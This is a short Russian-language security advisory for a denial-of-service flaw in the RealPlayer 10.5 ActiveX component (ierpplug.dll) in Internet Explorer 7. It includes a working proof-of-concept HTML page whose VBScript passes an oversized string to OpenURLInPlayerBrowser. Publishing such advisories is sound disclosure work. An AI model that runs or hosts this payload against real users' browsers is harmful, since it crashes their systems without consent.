Программа: Internet Explorer 7 RealPlayer 10.5 ActiveX
Уязвимость позволяет удаленному злоумышленнику выполнить DoS атаку на целевую систему. Уязвимость существует из-за ошибки в проверке входных в RealPlayer ActiveX компоненте в ierpplug.dll. Атакующий может передать приложению злонамеренные данные, что приведет к отказу системы в обслуживании.
Пример:
<html>
<object classid='clsid:FDC7A535-4070-4B92-A0EA-D9994BCC0DC5' id='RealPlayer'></object>
<script language='vbscript'>
argCount = 2
arg1="default"
arg2=String(1000000, "A")
RealPlayer.OpenURLInPlayerBrowser arg1 ,arg2
</script>
